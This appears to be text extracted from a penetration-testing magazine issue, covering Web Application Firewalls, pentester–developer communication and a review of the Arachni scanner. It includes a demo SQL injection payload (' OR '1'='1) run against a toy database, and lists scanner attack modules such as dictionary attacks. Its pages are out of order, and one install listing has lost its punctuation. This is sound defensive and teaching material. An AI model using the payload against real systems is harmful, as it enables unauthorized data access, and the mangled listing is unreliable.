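The Session Fixation pitfall can be illustrated with a short sketch. The session store, field names and login helper below are hypothetical and framework-agnostic; the essential move is that the session ID is regenerated at the moment of login, so an ID planted by an attacker before authentication never becomes an authenticated one.

```python
import secrets

# Toy in-memory session store: session ID -> session data (illustration only)
sessions = {}

def new_session():
    sid = secrets.token_hex(16)       # fresh, unguessable ID
    sessions[sid] = {}
    return sid

def login(old_sid, username):
    """Authenticate and rotate the session ID to prevent Session Fixation."""
    data = sessions.pop(old_sid, {})  # invalidate the pre-login ID
    data["user"] = username
    new_sid = secrets.token_hex(16)
    sessions[new_sid] = data
    return new_sid

anonymous_id = new_session()
sessions[anonymous_id]["cart"] = ["book"]
authed_id = login(anonymous_id, "alice")
assert authed_id != anonymous_id      # a fixed pre-login ID is now worthless
assert anonymous_id not in sessions
assert sessions[authed_id]["user"] == "alice"
```

An application that keeps the pre-login ID, as described above, skips the `pop` and reuse step, which is exactly what makes retrofitting this behaviour awkward.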
If existing web applications display weak spots, and the probability is relatively high, then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether, and to what extent, the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are to be developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more safely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally, the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF, it is still advisable to check the security functions, as conducted by penetration testers. This might reveal, for example, that the system can be misused through SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis, as this would lead to misjudging the achieved security status: filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing Web Application Security.
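The inverted-commas example can be made concrete with a small sketch. The quote-stripping rule below is a stand-in for a hypothetical WAF filter and, as the text notes, it is not a complete defence; the parameterized query at the end shows the application-side fix.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

query = "SELECT secret FROM users WHERE name = '%s'"   # vulnerable pattern
payload = "' OR '1'='1"

# Without any protection, the classic payload dumps the table.
assert conn.execute(query % payload).fetchall() == [("s3cret",)]

def waf_filter(value):
    # Hypothetical WAF rule from the example: strip inverted commas.
    return value.replace("'", "")

# The rule defuses this particular payload...
assert conn.execute(query % waf_filter(payload)).fetchall() == []

# ...but the durable fix stays in the application: parameterized queries,
# which treat the payload as data rather than SQL.
assert conn.execute(
    "SELECT secret FROM users WHERE name = ?", (payload,)).fetchall() == []
```

This also illustrates why the WAF rule alone misjudges the security status: the filter neutralizes one payload shape, while the parameterized query removes the whole class.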
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes for several web
applications. If they are run in redundant mode, they can also provide load-balancing functions in order to distribute data traffic better and increase performance for the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAFs filter the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, then the WAF interrupts the data transfer or reacts in a different way predefined in the configuration. If, for example, two parameters have been defined for a monitored entry form, then the WAF can block all requests that contain three or more parameters. In the same way, the length and the contents of parameters can be checked. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value area.
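A minimal sketch of such parameter rules, with hypothetical form names and limits (no real WAF rule syntax is implied):

```python
import re

# Hypothetical rule set for one monitored entry form, mirroring the
# example in the text: exactly two parameters, bounded length, and a
# restricted character set.
RULES = {
    "max_params": 2,
    "max_length": 32,
    "allowed": re.compile(r"^[A-Za-z0-9 @._-]*$"),
}

def check_request(params):
    """Return True if the request satisfies the general parameter rules."""
    if len(params) > RULES["max_params"]:
        return False                      # e.g. a third, injected parameter
    for value in params.values():
        if len(value) > RULES["max_length"]:
            return False                  # overlong value
        if not RULES["allowed"].match(value):
            return False                  # character outside the value area
    return True

assert check_request({"user": "alice", "mail": "alice@example.org"})
assert not check_request({"user": "a", "mail": "b", "debug": "1"})   # 3 params
assert not check_request({"user": "<script>", "mail": "x"})          # bad chars
```

Real WAFs express the same constraints declaratively per form or URL; the point here is only how far generic quality rules already go.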
Of course, an integrated XML Firewall should also be standard these days, because more and more web applications are based on XML. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rate-limiting rule with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is sent to the web application.
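A crude version of the nested-elements check such an XML firewall performs might look like the following; the depth limit is an invented example value, and a real product would of course enforce many more constraints.

```python
import xml.etree.ElementTree as ET
from io import StringIO

def nesting_ok(xml_text, limit=20):
    """Reject documents whose element nesting exceeds the limit,
    a crude guard against nested-element (XML bomb style) attacks."""
    depth = 0
    for event, _elem in ET.iterparse(StringIO(xml_text), events=("start", "end")):
        if event == "start":
            depth += 1
            if depth > limit:
                return False
        else:
            depth -= 1
    return True

assert nesting_ok("<a><b><c/></b></a>", limit=5)
deep = "<x>" * 30 + "</x>" * 30          # 30 levels of nested elements
assert not nesting_ok(deep, limit=20)
```

Because the check is streaming (`iterparse`), the firewall can abort before the document is fully read, which matters for resource-exhaustion attacks.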
Figure 2 An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser, if, for example, a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever there are changes to the application; whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
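The combined approach can be sketched as follows; the patterns, paths and parameter names are hypothetical stand-ins for a templated blacklist plus a whitelist profile covering one high-value page.

```python
import re

# Hypothetical hybrid policy: a site-wide blacklist of known-bad
# patterns, plus a strict whitelist profile for one high-value page.
BLACKLIST = [re.compile(p, re.I) for p in (r"<script", r"union\s+select")]
WHITELIST = {"/order": {"item": re.compile(r"^\d{1,6}$")}}

def allowed(path, params):
    # Blacklist applies everywhere (the templated negative profile).
    for value in params.values():
        if any(p.search(value) for p in BLACKLIST):
            return False
    # Whitelist applies only where a profile exists (high-value pages).
    profile = WHITELIST.get(path)
    if profile is not None:
        if set(params) != set(profile):
            return False
        return all(profile[k].match(v) is not None for k, v in params.items())
    return True

assert allowed("/news", {"q": "waf"})
assert not allowed("/news", {"q": "<script>alert(1)</script>"})
assert allowed("/order", {"item": "1234"})
assert not allowed("/order", {"item": "1234", "price": "0"})   # extra param
```

Only the small whitelisted section needs re-learning when the order form changes; the rest of the site is covered by the low-maintenance blacklist, which is exactly the trade-off described above.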
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Some special functions are only available here: as a Full Reverse Proxy, a WAF provides for example Instant SSL, which converts HTTP pages into HTTPS without any changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, rewriting the URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to fend off Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks, which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and Cookie Security prevents identity theft. But the Proxy WAFs must also be configured according to the respective requirements; penetration tests help with the correct configuration.
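URL translation of this kind can be sketched with a single rewrite rule; the public and hidden URLs below are invented for illustration and do not reflect any particular product's rule syntax.

```python
import re

# Hypothetical rewrite table: a neutral public URL is mapped to the
# application's real (hidden) URL, so backend details stay concealed.
REWRITES = [
    (re.compile(r"^/shop/(\w+)$"), r"/cgi-bin/shopcart.pl?page=\1"),
]

def rewrite(public_url):
    for pattern, target in REWRITES:
        if pattern.match(public_url):
            return pattern.sub(target, public_url)
    return public_url          # no rule: pass through unchanged

assert rewrite("/shop/checkout") == "/cgi-bin/shopcart.pl?page=checkout"
assert rewrite("/index.html") == "/index.html"
```

A visitor (or scanner) only ever sees `/shop/...`, so the technology stack behind the proxy, CGI scripts, paths, file extensions, gives nothing away.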
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support this?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.

Penetration testers can fall back on web scanners to run security checks on web applications, and several WAFs provide extra interfaces to automate tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context, the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or their use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for a safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on familiar configuration workflows for security clusters, which ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In this role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd.

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
WEB APP SECURITY
but which is the right one to use to ensure secure code development?
.NET has a single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is therefore not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy. There is a third approach, which I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write the test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: using the WAPT activity, instead of an implement a filtering policy statement you produce a set of rspec/cucumber scenarios modeling how the source code must deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, it means your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group.
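The scenarios themselves would be written in rspec/cucumber; as a language-neutral illustration, here is the same given/when/then idea expressed in Python with plain assertions, where `sanitize` is a hypothetical application filter under test, not a real library function.

```python
import html

def sanitize(value):
    # Hypothetical application-side filter under test: HTML-encode input.
    return html.escape(value)

def test_rejects_script_injection():
    # Given a malicious input taken from the WAPT report
    malicious = '<script>alert("xss")</script>'
    # When the application processes it
    result = sanitize(malicious)
    # Then no executable markup survives
    assert "<script>" not in result

def test_preserves_legitimate_input():
    assert sanitize("hello world") == "hello world"

test_rejects_script_injection()
test_preserves_legitimate_input()
```

When a test like the first one fails, the developer has an exact, executable definition of "implement a filtering policy" to code against, which is the whole point of the BDD hand-off.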
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so bug fixes are often prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process using a non-common-ground language that confuses or annoys everyone and pushes the groups even further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most of the remediation consists of source code fixes.
The security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by the OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class or line where the problem exists so that they can fix it. Given enough time, developers can eventually determine where the problem lies, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production on schedule.
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:
• Creating a development framework that has security built into it
• Designing an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works when a programming language has a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra have some security facilities as well). In the Java programming language community, by contrast, there are a lot of non-standardized frameworks available to developers,
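The escape-by-default idea behind such framework helpers can be sketched in a few lines; `render` here is a hypothetical helper for illustration, not the Rails API.

```python
import html

def render(template, **params):
    """Hypothetical framework helper: every value is escaped by default,
    so developers inherit output filtering without asking for it."""
    safe = {k: html.escape(str(v)) for k, v in params.items()}
    return template.format(**safe)

page = render("<p>Hello, {name}</p>", name='<img src=x onerror=alert(1)>')
assert "<img" not in page        # payload neutralized by default
assert "&lt;img" in page         # rendered as inert text instead
```

Because escaping is the default rather than an opt-in call, the developer gets the protection transparently, which is exactly the "security built into the framework" idea described above.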
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practicing the Taekwon-do ITF martial art. He's a husband, a daddy and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset, and must choose the best combination of tools possible for the job at hand. Is Arachni worthwhile?
Time for an in-depth review
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins; developers can easily use the advanced framework features without knowing the nitty-gritty details
Pulling the Legs of Arachni
Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit Card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architectural and a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share the load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP 1.1 and HTTP 1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest Authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler is always run at the start of the scan. This crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
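The include/exclude filtering can be sketched with two regular expressions; the URLs and patterns below are invented examples and do not reflect Arachni's actual option syntax.

```python
import re

# Invented scope filters mirroring the idea of include/exclude rules.
INCLUDE = re.compile(r"^https?://shop\.example\.com/")
EXCLUDE = re.compile(r"/logout|\.pdf$")

def in_scope(url):
    """Crawl a URL only if it matches the include rule and no exclude rule."""
    return bool(INCLUDE.match(url)) and not EXCLUDE.search(url)

assert in_scope("https://shop.example.com/cart")
assert not in_scope("https://shop.example.com/logout")      # excluded
assert not in_scope("https://other.example.com/cart")       # out of scope
assert not in_scope("https://shop.example.com/manual.pdf")  # excluded
```

Excluding URLs such as a logout link is a practical necessity: following it mid-scan would silently terminate an authenticated session.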
The HTML parser can extract forms, links, cookies and headers. It can gracefully handle badly written HTML, thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
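As a rough analogue of this parsing step (using Python's forgiving stdlib parser rather than Nokogiri), here is a sketch that pulls links and form input names out of sloppy markup:

```python
from html.parser import HTMLParser

class FormLinkExtractor(HTMLParser):
    """Collect links and form input names, even from sloppy markup
    (Python's html.parser is tolerant of unclosed tags)."""
    def __init__(self):
        super().__init__()
        self.links = []
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and "href" in attrs:
            self.links.append(attrs["href"])
        elif tag == "input" and "name" in attrs:
            self.inputs.append(attrs["name"])

# Badly written HTML: unquoted attribute values, unclosed <form> tag.
bad_html = '<a href="/next">next<form action=/search><input name=q><input name=go>'
parser = FormLinkExtractor()
parser.feed(bad_html)
parser.close()
assert parser.links == ["/next"]
assert parser.inputs == ["q", "go"]
```

For a scanner, tolerance of broken markup is essential: the input names recovered here are exactly the injection points the audit modules will attack.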
Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2: Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form-based AutoLogin: performs an automated login
• Dictionary attacker: performs dictionary attacks against HTTP Authentication and form-based authentication
• Profiler: performs taint analysis with benign inputs and response-time analysis
• Cookie collector: keeps track of cookies while establishing a timeline of the changes
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types: logs the content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules: loads and runs high-level meta-analysis modules pre-, mid- and post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  • TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run Arachni natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory; change the cd commands if you want the sources somewhere else. In case you need to update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsql3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:

$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands in Listing 2 in the Cygwin shell (note: these are the same commands as for the Linux installation).
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:

$ find /usr/local -iname '*.so' > /tmp/local.so.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose Run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/local.so.lst

Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command-line.
The GUI can be started by executing the following commands:
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers. The dispatcher(s) will run the actual scan.
Figure 1. Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1):

• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) or Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, ...
• Settings: the settings screens allow you to add cookies and headers, limit the scan to certain directories, ...
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher.
  • Tutorial: serves as an example.
  • Scheduler: schedules and runs scan jobs at a specific time.
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:

$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
